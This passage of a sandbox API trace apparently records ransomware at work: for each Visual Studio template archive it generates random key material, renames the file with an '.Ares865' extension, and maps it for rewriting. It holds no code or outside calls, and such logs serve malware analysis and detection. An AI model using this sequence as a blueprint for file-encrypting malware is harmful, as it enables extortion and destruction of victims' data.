dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8c0) returned 0x190000 [0055.234] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.235] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.235] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.251] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip.Ares865") returned 112 [0055.251] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\aboutbox.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\aboutbox.zip.ares865"), dwFlags=0x1) returned 1 [0055.251] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\aboutbox.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.252] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=35666) returned 1 [0055.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.252] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.253] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.253] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.253] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8e60, lpName=0x0) returned 0x120 [0055.255] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8e60) returned 0x190000 [0055.258] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.258] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.258] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.258] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.259] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.Ares865") returned 113 [0055.259] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfig.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfig.zip.ares865"), dwFlags=0x1) returned 1 [0055.260] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfig.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.260] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=593) returned 1 [0055.260] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.260] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.260] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.260] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.261] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.261] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.261] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x560, lpName=0x0) returned 0x120 [0055.263] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x560) returned 0x190000 [0055.269] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.270] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.270] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.270] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.Ares865") returned 121 [0055.270] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip.ares865"), dwFlags=0x1) returned 1 [0055.271] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.271] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=621) returned 1 [0055.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.271] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.272] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.272] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.272] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x570, lpName=0x0) returned 0x120 [0055.274] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x570) returned 0x190000 [0055.275] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.275] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.275] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.276] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.Ares865") returned 116 [0055.276] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip.ares865"), dwFlags=0x1) returned 1 [0055.277] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.277] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1170) returned 1 [0055.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.277] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.278] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.278] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.278] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x120 [0055.279] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x190000 [0055.281] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.281] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.281] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.282] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.Ares865") returned 124 [0055.282] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip.ares865"), dwFlags=0x1) returned 1 [0055.287] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfointernal.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.287] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1250) returned 1 [0055.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.288] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.289] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.289] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.289] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x120 [0055.290] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x190000 [0055.291] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.292] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.292] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.292] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.293] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip.Ares865") returned 109 [0055.293] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\class.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\class.zip.ares865"), dwFlags=0x1) returned 1 [0055.296] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\class.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.296] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=701) returned 1 [0055.296] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.297] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.297] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.297] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.298] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5c0, lpName=0x0) returned 0x120 [0055.300] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5c0) returned 0x190000 [0055.302] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.302] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.302] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.303] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip.Ares865") returned 112 [0055.303] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\codefile.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\codefile.zip.ares865"), dwFlags=0x1) returned 1 [0055.308] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\codefile.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.308] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=546) returned 1 [0055.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.308] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.309] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.309] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.309] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x530, lpName=0x0) returned 0x120 [0055.314] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x530) returned 0x190000 [0055.316] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.317] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.317] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.317] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.317] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip.Ares865") returned 111 [0055.317] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\dataset.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\dataset.zip.ares865"), dwFlags=0x1) returned 1 [0055.318] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\dataset.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.318] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1177) returned 1 [0055.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.319] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.319] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.319] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.319] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.319] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.319] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x120 [0055.322] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x190000 [0055.329] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.330] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.330] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.331] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip.Ares865") returned 117 [0055.331] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\emptydatabase.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\emptydatabase.zip.ares865"), dwFlags=0x1) returned 1 [0055.331] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\emptydatabase.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.331] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=833) returned 1 [0055.331] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.332] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.332] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.332] CryptReleaseContext (hProv=0x2f0380, 